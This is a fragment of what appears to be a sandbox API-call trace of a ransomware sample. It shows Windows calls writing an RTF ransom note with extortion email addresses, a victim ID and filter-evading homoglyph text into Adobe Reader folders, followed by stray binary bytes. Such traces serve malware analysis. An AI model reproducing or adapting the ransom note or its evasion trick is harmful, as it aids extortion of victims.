str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1ea3958, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n\x90iÁoA¯Ú8r\x13\x96\x02¶\x99\x84b\x9a\x15ܽ²ýe\x1c\x06\x86\x0bm\"_\x82¥Ç0Ó\x18â\x17ê\x1b¥!Î~Ð\x11\\\x13u¿Ò$½Iq¯/\x0f)Ý\x8cÄ7ÓPå8Ë]\x08¢hjß\x9bÕ\x81¯\x89±¢¾¹ÝÒl\x94\x90ª\x89®Y\x17P\x9aÜC꺬p¶<ã4xI}\x90\x12÷r4Ûñ\x95ôXÒ¸â,Ái\x9dP)\x08\x86ÍZí\x0f­ê%}¯\x96¹\x04^=<¥\r.Z\x97\x1bxy", lpUsedDefaultChar=0x0) returned 7247 [0066.282] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0066.459] CloseHandle (hObject=0x1cc) returned 1 [0066.459] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\bg85_info.rtf")) returned 0xffffffff [0066.459] GetLastError () returned 0x2 [0066.460] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\SKY\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\sky\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0066.460] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd 